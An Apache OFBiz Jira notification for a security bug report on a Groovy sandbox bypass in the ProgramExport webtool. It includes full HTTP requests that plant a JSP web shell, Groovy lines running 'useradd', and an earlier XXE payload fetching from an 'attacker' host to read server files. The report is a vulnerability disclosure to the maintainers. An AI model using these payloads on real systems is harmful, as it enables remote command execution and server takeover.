You are viewing a plain text version of this content. The canonical link for it is here.
Posted to notifications@ofbiz.apache.org by "thiscodecc (Jira)" <ji...@apache.org> on 2021/08/27 07:54:00 UTC

[jira] [Updated] (OFBIZ-12305) Groovy Program sandbox bypass

     [ https://issues.apache.org/jira/browse/OFBIZ-12305?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

thiscodecc updated OFBIZ-12305:
-------------------------------
    Description: 
Code location
https://github.com/apache/ofbiz-framework/blob/trunk/framework/webtools/groovyScripts/entity/ProgramExport.groovy#L89-L92

The judgment of Groovy code here can easily bypass this restriction.

a)
The http packet is as follows:

POST /webtools/control/ProgramExport HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1:8443/webtools/control/ProgramExport
Content-Type: application/x-www-form-urlencoded
Content-Length: 925
Origin: https://127.0.0.1:8443
Connection: close
Cookie: JSESSIONID=BC833071F17F30BE022A7D44A5BB78C5.jvm1; OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; login_nickname=admin; UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

groovyProgram=// Use the List variable recordValues to fill it with GenericValue maps.
// full groovy syntaxt is available

import org.apache.ofbiz.entity.util.EntityFindOptions

def x = "jsp"
def f = "%"
def x2 = "<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print(\"<pre>\");while((a=in.read(b))!=-1)\{out.println(new String(b));}out.print(\"</pre>\");%>"

def w_file = new File("/Users/master/Downloads/ofbiz-framework-release17.12.08/themes/common/webapp/images/123."+x)
w_file.withWriter { writer ->
 writer.append(x2)
}&submitButton=运行*

In this way, the jsp Trojan is uploaded.

b)
Use groovy to execute system commands to bypass restrictions.

def process = "touch /tmp/xxx".execute()
def process2 = "useradd vvv".execute()

There are very mature solutions on the groovy sandbox on the market. You can refer to it.

  was:
The http packet is as follows:

POST /webtools/control/ArtifactInfo HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1:8443/webtools/control/ArtifactInfo
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Origin: https://127.0.0.1:8443
Connection: close
Cookie: JSESSIONID=E5591794A3BE924E307356FCA2B0A1A6.jvm1; OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; login_nickname=admin; UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

name=x&location=[http://attacker:8111/2.xml&type=request&submitButton=Lookup]

 

The content of the 2.xml file of the attacker's http service is as follows:

 

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE Quan SYSTEM "http://127.0.0.1:12311/vlab.dtd"><xml-body></xml-body>

The XXE vulnerability can read arbitrary files on the server.

 

 

 

 

        Summary: Groovy Program sandbox bypass  (was: Found a new XXE (XML External Entity Injection) vulnerability.)

> Groovy Program sandbox bypass
> -----------------------------
>
>                 Key: OFBIZ-12305
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12305
>             Project: OFBiz
>          Issue Type: Bug
>    Affects Versions: 17.12.08
>            Reporter: thiscodecc
>            Priority: Major
>              Labels: security
>
> Code location
> https://github.com/apache/ofbiz-framework/blob/trunk/framework/webtools/groovyScripts/entity/ProgramExport.groovy#L89-L92
> The judgment of Groovy code here can easily bypass this restriction.
> a)
> The http packet is as follows:
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 127.0.0.1:8443
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) Gecko/20100101 Firefox/91.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
> Accept-Encoding: gzip, deflate
> Referer: https://127.0.0.1:8443/webtools/control/ProgramExport
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 925
> Origin: https://127.0.0.1:8443
> Connection: close
> Cookie: JSESSIONID=BC833071F17F30BE022A7D44A5BB78C5.jvm1; OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; login_nickname=admin; UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false
> Upgrade-Insecure-Requests: 1
> Sec-Fetch-Dest: document
> Sec-Fetch-Mode: navigate
> Sec-Fetch-Site: same-origin
> Sec-Fetch-User: ?1
> groovyProgram=// Use the List variable recordValues to fill it with GenericValue maps.
> // full groovy syntaxt is available
> import org.apache.ofbiz.entity.util.EntityFindOptions
> def x = "jsp"
> def f = "%"
> def x2 = "<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print(\"<pre>\");while((a=in.read(b))!=-1)\{out.println(new String(b));}out.print(\"</pre>\");%>"
> def w_file = new File("/Users/master/Downloads/ofbiz-framework-release17.12.08/themes/common/webapp/images/123."+x)
> w_file.withWriter { writer ->
>  writer.append(x2)
> }&submitButton=运行*
> In this way, the jsp Trojan is uploaded.
> b)
> Use groovy to execute system commands to bypass restrictions.
> def process = "touch /tmp/xxx".execute()
> def process2 = "useradd vvv".execute()
> There are very mature solutions on the groovy sandbox on the market. You can refer to it.



--
This message was sent by Atlassian Jira
(v8.3.4#803005)